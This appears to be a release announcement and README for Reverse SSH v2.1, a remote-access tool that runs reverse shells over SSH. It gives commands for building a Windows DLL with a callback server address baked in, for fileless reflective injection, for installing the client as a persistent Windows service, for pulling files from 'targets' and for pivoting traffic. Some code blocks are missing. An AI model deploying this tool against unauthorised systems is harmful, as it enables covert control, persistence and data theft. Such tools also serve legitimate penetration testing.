Reverse SSH v2.1 releases: SSH based reverse shell
Want to use SSH for reverse shells? Now you can.
- Manage and connect to reverse shells with native SSH syntax
- Dynamic, local, and remote forwarding
- Native SCP and SFTP implementations for retrieving files from your targets
- Full windows shell
- Mutual client & server authentication to create high trust control channels
Specify a default server at build time:
Built-in Web Server
The RSSH server can also run an HTTP server on the same port as the RSSH server listener which serves client binaries. The server must be placed in the project bin/ folder, as it needs to find the client source.
Then you can download it as follows:
Windows DLL Generation
You can compile the client as a DLL to be loaded with something like Invoke-ReflectivePEInjection. This will need a cross compiler if you are doing this on Linux, use mingw-w64-gcc.
CC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll
When the RSSH server has the webserver enabled you can also compile it with the link command:
This is useful when you want to do a fileless injection of the rssh client.
The SSH ecosystem allows out definition and call of subsystems with the -s flag. In RSSH this is repurposed to provide special commands for platforms.
list Lists available subsystem
sftp: Runs the sftp handler to transfer files
setgid: Attempt to change group
setuid: Attempt to change user
service: Installs or removes the rssh binary as a windows service, requires administrative rights
# Install the rssh binary as a service (windows only)
ssh -J your.rssh.server.com:3232 test-pc.user.test-pc -s service –install
Windows Service Integration
The client RSSH binary supports being run within a windows service and won’t time out after 10 seconds. This is great for creating persistent management services.
Full Windows Shell Support
Most reverse shells for windows struggle to generate a shell environment that supports resizing, copying, and pasting and all the other features that we’re all very fond of. This project uses conpty on newer versions of windows, and the winpty library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.
The RSSH server can send out raw HTTP requests set using the webhook command from the terminal interface.
First, enable a webhook:
$ ssh your.rssh.server.com -p 3232
catcher$ webhook –on http://localhost:8080/
Then disconnect, or connect a client, this will when issuing a POST request with the following format.
RSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (-L, -R), but in this mode, you can send UDP, and ICMP.
First set up a tun (layer 3) device on your local machine.
Install a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device.
ssh -J your.rssh.server.com:3232 user.wombo -w 0:anyThis has some limitations, it is only able to send UDP/TCP/ICMP, and not arbitrary layer 3 protocols. ICMP is the best effort and may use the remote hosts ping tool, as ICMP sockets are privileged on most machines. This also does not support tap devices, e.g layer 2 VPN, as this would require administrative access.
This release adds new functionality to the
listen server console command and a client feature (hence the version bump).
listennow takes either
-cto denote working on the server or client control port. This now allows you to open the server control port on a client.
# Open the server listening port on all (*) clients on tcp port 1111 listen -c * --on :1111
This means that new clients can connect to any existing client on port
1111 and be controllable.
Unfortunately clients below
v2.1.0 will require just starting a remote forward with regular ssh syntax (
--proxyto ‘bake’ in a proxy address on compilation
- Makefile now strips off home path with
proxyvariable can now be baked in to DLLs and regular golang binaries with the
Install & Use
Copyright (c) 2022, NHAS
All rights reserved.